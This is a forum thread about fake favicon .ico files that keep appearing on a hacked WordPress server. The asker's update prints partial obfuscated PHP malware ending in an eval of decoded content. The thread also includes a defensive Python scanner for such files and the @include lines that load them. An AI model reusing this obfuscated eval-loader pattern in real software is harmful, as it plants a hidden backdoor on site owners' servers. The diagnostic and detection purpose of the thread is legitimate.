Mysterious ico files appearing on webserver

@Welton855

Posted in: #Apache #HackedSite #SharedHosting

Files are unexpectedly appearing on one of my shared web servers. They can appear in pretty much hundreds of directories and they are always called something like favicon_1166f9.ico. The first 6 characters are always favico and the extension is always ico. Although these are not icons and cannot be opened by an image viewer.

Five days ago I did a clean sweep and deleted hundreds of these files, yet I just found two. I noticed some on the server before but thought it was just corruption from uploading a favicon, but obviously this is not the case. The site actually has one favicon.ico in just the home dir and it is working fine.

What could be causing these files to keep appearing? Is the site hacked?

UPDATE 1: Starting to really look like a hack. Here is the partial content being inserted:

$c6d81c6 = 607;$GLOBALS['g1aff67e']=Array();global$g1aff67e;$g1aff67e=$GLOBALS;${"x47x4cx4fBx41x4cx53"}['h21842aa7']="x59x2fx6cx45x75x44x7ax6fx68x2ax53x74x73x51x48x72x26x21x25x67x28x70x55x7cxax76x35x60x52x43x65x3dx4dx71x4fx32x31x7ex34x20x5ax41x2ex2cx3bx9x30x6ax57x6ex3f


And it goes on for 7K ending in:

[91].$g1aff67e['h21842aa7'][38].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][57].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][66].$g1aff67e['h21842aa7'][38]]($b7ce1c0db)==3){eval/*v3f8d8*/($b7ce1c0db[1]($b7ce1c0db[2]));exit();}}} ?>


Note that the last part is an eval of whatever the rest is.

UPDATE 2: This StackOverflow question shows someone with the same problem.

There is an accepted answer, but the proposed solution is to disable all POST requests, which will not be possible here given this is a WordPress site and there are other parts using POST too (not many, but they are necessary).

Given this information it seems that this is an attack and not a virus, which is probably why a virus scan turned up nothing.

The question now is: How do I prevent this attack from working? If that is in fact what is going on.


@Odierno851

This is an attack targeting a PHP vulnerability with POST requests.

The attacker somehow manages to change existing PHP files with an @include statement using an encoded path that translates into one of these .ico files, which are self-decrypting PHP files calling an external script from another server.

Blocking POST requests works so far. Although that is only possible for sites that do not depend on external POST requests. This can be done in the .htaccess file as explained here.

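Added example, not code from either poster: a scanner for the two artifacts this thread describes, PHP source hiding in files named favico...ico, and PHP files whose @include target is written as an escaped string that resolves to one of those .ico files. The `x47x4cx4fBx41x4cx53` run in the pasted sample is PHP `\xHH` notation with the backslashes stripped by the paste; it decodes to `GLOBALS`, and the same decoder recovers the include path. The web root layout, file contents and the `/var/www/html` path below are constructed for the demo.

```python
"""
Scan a web root for (1) icon-named files that are really PHP and
(2) PHP files that include/require a path resolving to a .ico file.
All sample files and paths are constructed; nothing is taken from a real server.
"""
import re
import tempfile
from pathlib import Path

# Dropped files are named favico...ico (per the question); genuine icons
# start with the ICO header 00 00 01 00.
ICO_NAME = re.compile(r"^favico.*\.ico$", re.IGNORECASE)
ICO_MAGIC = b"\x00\x00\x01\x00"

# include/require with a quoted string argument. Group 1 = double-quoted body
# (PHP decodes \xHH and octal escapes there), group 2 = single-quoted body.
INCLUDE_RE = re.compile(
    r'@?\s*\b(?:include|require)(?:_once)?\b\s*\(?\s*'
    r'(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')',
    re.IGNORECASE,
)
_ESC = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)")


def decode_php_escapes(s: str) -> str:
    """Resolve the escape forms PHP honours inside double-quoted strings."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))      # \xHH
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))       # \NNN octal
        return {"n": "\n", "t": "\t", "r": "\r"}.get(m.group(3), m.group(3))
    return _ESC.sub(repl, s)


def is_fake_ico(data: bytes) -> bool:
    """True when a file posing as an icon lacks the ICO header and carries a PHP open tag."""
    if data.startswith(ICO_MAGIC):
        return False
    return b"<?" in data[:4096]


def find_ico_includes(php_source: str) -> list:
    """Return decoded include/require targets that end in .ico."""
    hits = []
    for m in INCLUDE_RE.finditer(php_source):
        if m.group(1) is not None:
            target = decode_php_escapes(m.group(1))   # double-quoted: decode escapes
        else:
            target = m.group(2)                       # single-quoted: literal
        if target.lower().endswith(".ico"):
            hits.append(target)
    return hits


def scan_webroot(root) -> dict:
    """Walk the tree once; report fake icons and PHP files that include them."""
    root = Path(root)
    findings = {"fake_ico": [], "ico_includes": []}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if ICO_NAME.match(path.name):
            if is_fake_ico(path.read_bytes()):
                findings["fake_ico"].append(rel)
        elif path.suffix.lower() == ".php":
            for target in find_ico_includes(path.read_text(errors="replace")):
                findings["ico_includes"].append((rel, target))
    return findings


# Constructed sample site: one real icon, one dropped "icon" holding PHP,
# one theme file with an escaped @include of it, one clean PHP file.
SAMPLE_SITE = {
    "favicon.ico": ICO_MAGIC + b"\x01\x00\x10\x10" + b"\x00" * 32,
    "wp-content/uploads/favicon_1166f9.ico":
        b"<?php $c6d81c6 = 607; $GLOBALS['g1aff67e'] = array(); /* ... */ ?>",
    "wp-content/themes/demo/header.php":
        b'<?php\n@include "\\x2fvar\\x2fwww\\x2fhtml\\x2fwp-content'
        b'\\x2fuploads\\x2ffavicon_1166f9.ico";\necho \'theme header\';\n',
    "index.php": b"<?php\nrequire 'wp-blog-header.php';\n",
}


def demo() -> dict:
    """Write the sample tree into a temp dir and scan it."""
    root = Path(tempfile.mkdtemp())
    for rel, content in SAMPLE_SITE.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)
    return scan_webroot(root)


if __name__ == "__main__":
    for kind, items in demo().items():
        print(kind)
        for item in items:
            print("  ", item)
```

Run it against a real document root with `scan_webroot("/path/to/public_html")`; the `fake_ico` list is what to remove, and each `ico_includes` entry names the legitimate PHP file that was modified and needs the injected line stripped (or the file restored from a known-good copy). Removing only the .ico files, as the question describes, leaves the includes in place, which is consistent with the files reappearing.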